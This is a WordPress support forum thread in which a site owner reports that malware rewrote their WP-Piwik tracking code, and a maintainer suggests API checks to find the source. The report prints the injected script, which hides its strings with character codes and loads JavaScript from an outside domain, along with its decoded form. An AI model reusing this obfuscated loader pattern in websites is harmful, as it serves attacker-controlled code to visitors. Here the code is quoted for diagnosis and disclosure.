wp-piwik-tracking_code : malicious code
-
hi,
not really sure if it’s the good place but i was hit by a malware which modified my wp-piwik-tracking_code to load code from another site;
my versions (wordpress and wp-piwik) wasn’t up-to-date so i’m guilty but i think i’m not alone in this case.
wp-piwik-tracking_code was modified to :
<script>var sc = document.createElement(String.fromCharCode(115, 99, 114, 105, 112, 116)); sc.src=String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 106, 97, 114, 46, 116, 114, 97, 102, 102, 105, 99, 98, 101, 116, 116, 101, 114, 46, 98, 105, 122, 47, 115, 46, 106, 115); sc.type = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116); document.getElementsByTagName(String.fromCharCode(104, 101, 97, 100))[0].appendChild(sc);</script>which can be decoded to
“var sc = document.createElement(“script”); sc.type = “text/javascript”; sc.src = “https://jar.trafficbetter.biz/s.js”; document.head.appendChild(sc);regards,
-
Did you also check your Piwik setup? Does Piwik itself deliver the malformed tracking code (so the attacker used Piwik) or was it directly injected to WordPress or via WP-Piwik?
You can test Piwik’s API response by executing…
{PIWIK_URL}?module=API&method=SitesManager.getJavascriptTag&idSite={SITE_ID}&piwikUrl=&format=xml&token_auth={AUTH_TOKEN}
and…
{PIWIK_URL}?module=API&method=SitesManager.getImageTrackingCode&idSite={SITE_ID}&piwikUrl=&format=xml&token_auth={AUTH_TOKEN}This issue was reported 3-4 times the last months, but no reporter ever gave a feedback on how the attacker intruded. Currently, there are no known vulnerabilities in Piwik or WP-Piwik, and without further information we also have no chance to test this in more detail. See also: https://github.com/braekling/WP-Matomo/issues/66
The topic ‘wp-piwik-tracking_code : malicious code’ is closed to new replies.
